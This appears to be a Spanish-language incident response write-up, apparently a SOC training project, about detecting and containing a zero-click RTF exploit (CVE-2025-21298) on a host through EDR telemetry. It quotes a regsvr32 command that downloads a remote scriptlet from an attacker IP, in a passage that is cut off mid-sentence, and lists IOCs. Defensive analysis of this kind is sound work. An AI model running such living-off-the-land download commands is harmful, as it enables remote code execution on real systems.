
Investigación técnica y contención de host de un exploit RCE Zero-Click de severidad crítica (CVE-2025-21298) mediante telemetría EDR y análisis estático de malware.
Este proyecto documenta la investigación y contención de extremo a extremo de un intento de Ejecución Remota de Código (RCE) Zero-Click de severidad crítica. Mediante telemetría EDR e inteligencia de amenazas, identifiqué un ataque "Living off the Land" (LotL) que eludió las defensas automatizadas y estableció comunicación de comando y control (C2).
Identifiqué el Evento ID 314: Detección de RCE Zero-Click en Windows OLE. La telemetría inicial reveló que el archivo malicioso mail.rtf fue Permitido por las defensas perimetrales, lo que indica un compromiso activo en la estación de trabajo 'Austin'.

Realicé una verificación de reputación del hash del archivo en VirusTotal. Los resultados confirmaron una tasa de detección de 25/55, identificando específicamente el archivo como un RTF armado que utiliza CVE-2025-21298. Esta vulnerabilidad permite la ejecución remota de código a través del Panel de Vista Previa de Windows sin interacción del usuario.

Me dirigí al historial de terminal del EDR para el host 'Austin' para identificar el comportamiento posterior a la explotación. Descubrí una ejecución maliciosa "Living off the Land" (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) para descargar un script-let malicioso de un servidor remoto, eludiendo las listas blancas de aplicaciones estándar y las firmas tradicionales de antivirus.

Siguiendo el Marco de Respuesta a Incidentes del NIST, se priorizó la contención inmediata. Ejecuté un aislamiento de red en el host afectado para terminar la comunicación C2 y prevenir el movimiento lateral dentro de la red corporativa.

El incidente se cerró como un Verdadero Positivo. Documenté la IP del atacante (84.38.130.118) y la evidencia forense para los equipos de Inteligencia de Amenazas y Firewall para prevenir futuras ocurrencias.

| Tipo | Valor |
|---|
| Dirección IP C2 | 84.38.130.118 |
| Hash del archivo (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Vulnerabilidad | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |